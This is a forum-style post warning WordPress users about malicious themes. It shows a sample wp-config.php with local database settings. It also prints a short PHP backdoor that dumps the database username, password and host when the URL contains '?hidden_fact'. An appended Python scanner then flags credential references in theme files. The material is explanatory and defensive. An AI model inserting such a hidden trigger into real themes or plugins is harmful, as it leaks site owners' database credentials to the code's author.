Hey, I was thinking about this the other day. About how NOT safe it is for people to use WordPress themes without knowledge of PHP. I'm not sure if you know anything about PHP or any other coding languages, so I'll just give you an example:
WordPress, like pretty much every database-driven website, has a configuration file. WordPress's file is located at: http://www.example.com/wp-config.php (assuming you installed it to the root of your website). Inside it (once you have installed it) it will contain your username/password etc. for your database. This is my configuration file (it's for my local server, so it doesn't matter if you see it):
PHP Code:
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'sandbox');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', '');
/** MySQL hostname */
define('DB_HOST', 'localhost');
Now, where am I going with this? Well, if you give him access to your website via FTP (which there is no reason why you should need to), then he can look at the contents of the file.
Another thing, which is my main point and my biggest concern, would be this: if I added this code to any WordPress theme (I would have to have access to the source files of the theme (aka the theme builder)):
PHP Code:
if( isset($_GET['hidden_fact']) ){
    echo DB_USER . '<br/>';
    echo DB_PASSWORD . '<br/>';
    echo DB_HOST . '<br/>';
    echo DB_USER . '<br/>';
}
Then if you went to your website, http://www.example.com/, it looks fine: your new theme looks great, works great. But when the theme creator comes along and does this: http://www.example.com/?hidden_fact then he/she gets your database information.
There are loads of similar things he/she could do, which is why I think if you're going to use WordPress themes, then you should know basic PHP or basic programming.
Sorry for the long post, but I felt it's important you knew about the wp-config.php file as well as the little trick.
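An added example, not part of the original post: a first-pass audit to run over a theme's unpacked files before installing it, flagging any line that names the wp-config.php database constants and noting whether the same file also reads request input. The function names `scan_theme_source` and `scan_theme_dir` and the sample file contents are assumptions made for this illustration.

```python
import os
import re

# Names defined in wp-config.php, plus the file itself; theme code has no reason to mention them.
SECRET_REFERENCE = re.compile(r"\b(?:DB_NAME|DB_USER|DB_PASSWORD|DB_HOST)\b|wp-config\.php")
# Request input that could act as a hidden trigger, like ?hidden_fact in the post.
REQUEST_INPUT = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")

def scan_theme_source(path, source):
    """Return one finding per credential reference in a single PHP file's text."""
    gated = bool(REQUEST_INPUT.search(source))  # does the file also read request input?
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for match in SECRET_REFERENCE.finditer(line):
            findings.append({"file": path, "line": lineno,
                             "reference": match.group(0), "request_gated": gated})
    return findings

def scan_theme_dir(root):
    """Walk an unpacked theme directory and scan every PHP-like file."""
    findings = []
    for dirpath, _dirs, names in os.walk(root):
        for name in sorted(names):
            if name.lower().endswith((".php", ".phtml", ".inc")):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_theme_source(full, fh.read()))
    return findings

# Constructed sample: the snippet from the post as it might sit in a theme's footer.php.
SAMPLE_BACKDOORED = """<?php
if( isset($_GET['hidden_fact']) ){
    echo DB_USER . '<br/>';
    echo DB_PASSWORD . '<br/>';
}
?>"""
SAMPLE_CLEAN = "<?php wp_footer(); ?>"  # constructed: an ordinary template call

if __name__ == "__main__":
    for finding in scan_theme_source("footer.php", SAMPLE_BACKDOORED):
        print(finding)
    print(scan_theme_source("index.php", SAMPLE_CLEAN))  # no findings
```

A literal-name match like this is only a first pass and does not replace reading the theme's code.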